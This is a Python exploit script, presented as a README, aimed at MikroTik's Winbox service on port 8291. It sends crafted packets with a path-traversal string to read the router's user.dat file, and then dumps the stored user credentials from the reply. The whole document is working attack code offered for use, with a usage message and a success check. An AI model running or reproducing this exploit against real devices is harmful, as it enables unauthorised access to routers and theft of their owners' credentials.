README.md
Rendering markdown...
#!/usr/bin/env python3
import socket
import sys
from extract_user import dump
a = [0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
0x00, 0x00]
b = [0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x00]
if __name__ == "__main__":
if len(sys.argv) < 2 or (len(sys.argv) == 3 and not str.isdigit(sys.argv[2])) or len(sys.argv) > 3:
print("Usage: python3 WinboxExploit.py IP_ADDRESS [PORT]")
exit()
ip = sys.argv[1]
port = 8291
if len(sys.argv) == 3:
port = int(sys.argv[2])
#Initialize Socket
s = socket.socket()
s.settimeout(3)
try:
s.connect((ip, port))
except Exception as e:
print("Connection error: " + str(e))
exit()
#Convert to bytearray for manipulation
a = bytearray(a)
b = bytearray(b)
#Send hello and recieve the sesison id
s.send(a)
try:
d = bytearray(s.recv(1024))
except Exception as e:
print("Connection error: " + str(e))
exit()
#Replace the session id in template
b[19] = d[38]
#Send the edited response
s.send(b)
d = bytearray(s.recv(1024))
#Get results
print("Connected to " + ip + ":" + str(port))
if len(d[55:]) > 25:
print("Exploit successful")
dump(d[55:])
else:
print("Exploit failed")